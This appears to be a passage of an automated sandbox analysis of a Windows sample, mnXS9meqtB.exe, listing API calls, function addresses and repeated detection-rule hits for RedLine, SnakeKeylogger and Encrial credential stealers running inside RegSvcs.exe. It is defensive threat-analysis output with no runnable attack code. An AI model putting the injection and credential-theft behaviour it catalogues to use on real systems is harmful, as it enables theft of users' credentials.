              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_00346606: CreateFileW,DeviceIoControl,CloseHandle, | 0_2_00346606
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0033ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, | 0_2_0033ACC5
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_003479D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, | 0_2_003479D3
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0032B043 | 0_2_0032B043
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0033410F | 0_2_0033410F
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_003202A4 | 0_2_003202A4
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0030E3B0 | 0_2_0030E3B0
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0033038E | 0_2_0033038E
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0033467F | 0_2_0033467F
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_003206D9 | 0_2_003206D9
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0036AACE | 0_2_0036AACE
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_00334BEF | 0_2_00334BEF
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0032CCC1 | 0_2_0032CCC1
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_00306F07 | 0_2_00306F07
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0030AF50 | 0_2_0030AF50
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0031B11F | 0_2_0031B11F
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_003631BC | 0_2_003631BC
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0032D1B9 | 0_2_0032D1B9
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0032123A | 0_2_0032123A
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_00313200 | 0_2_00313200
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0033724D | 0_2_0033724D
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_003093F0 | 0_2_003093F0
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_003413CA | 0_2_003413CA
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0031F563 | 0_2_0031F563
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_003096C0 | 0_2_003096C0
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0034B6CC | 0_2_0034B6CC
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_003077B0 | 0_2_003077B0
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0036F7FF | 0_2_0036F7FF
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_003379C9 | 0_2_003379C9
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0031FA57 | 0_2_0031FA57
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_00313B70 | 0_2_00313B70
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_00309B60 | 0_2_00309B60
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_00307D19 | 0_2_00307D19
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0031FE6F | 0_2_0031FE6F
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_00329ED0 | 0_2_00329ED0
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_00307FA3 | 0_2_00307FA3
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_00D47EB0 | 0_2_00D47EB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_00408C60 | 2_2_00408C60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0040DC11 | 2_2_0040DC11
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_00407C3F | 2_2_00407C3F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_00418CCC | 2_2_00418CCC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_00406CA0 | 2_2_00406CA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_004028B0 | 2_2_004028B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0041A4BE | 2_2_0041A4BE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_00418244 | 2_2_00418244
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_00401650 | 2_2_00401650
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_00402F20 | 2_2_00402F20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_004193C4 | 2_2_004193C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_00418788 | 2_2_00418788
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_00402F89 | 2_2_00402F89
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_00402B90 | 2_2_00402B90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_004073A0 | 2_2_004073A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_02B11437 | 2_2_02B11437
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_02B11448 | 2_2_02B11448
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_02B111A8 | 2_2_02B111A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_02B11199 | 2_2_02B11199
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_02B1116B | 2_2_02B1116B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_03068438 | 2_2_03068438
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_03064950 | 2_2_03064950
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_03062F10 | 2_2_03062F10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0306EEC8 | 2_2_0306EEC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_030650C8 | 2_2_030650C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_03062190 | 2_2_03062190
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_03062F01 | 2_2_03062F01
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0306EEBE | 2_2_0306EEBE
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: String function: 0032F8A0 appears 35 times
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: String function: 00326AC0 appears 42 times
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: String function: 0031EC2F appears 68 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0040E1D8 appears 44 times
              Source: mnXS9meqtB.exe, 00000000.00000003.2334385755.000000000390D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs mnXS9meqtB.exe
              Source: mnXS9meqtB.exe, 00000000.00000003.2336836817.0000000003763000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs mnXS9meqtB.exe
              Source: mnXS9meqtB.exe, 00000000.00000002.2347142574.0000000003150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCloudServices.exe< vs mnXS9meqtB.exe
              Source: mnXS9meqtB.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 0.2.mnXS9meqtB.exe.3150000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 2.2.RegSvcs.exe.40de898.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.40de898.6.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2ef0000.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2ef0000.5.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2bc1b46.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2bc1b46.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.40b5678.7.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.40b5678.7.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2eb0ee8.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2eb0ee8.4.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2eb0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2eb0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2eb0000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2eb0000.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2ef0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2ef0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.40b6560.8.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.40b6560.8.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2bc1b46.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2bc1b46.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.40b5678.7.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.40b5678.7.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2eb0ee8.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2eb0ee8.4.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2bc0c5e.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2bc0c5e.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.40b6560.8.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.40b6560.8.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2bc0c5e.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2bc0c5e.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.40de898.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.40de898.6.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000002.4776143140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000000.00000002.2347142574.0000000003150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
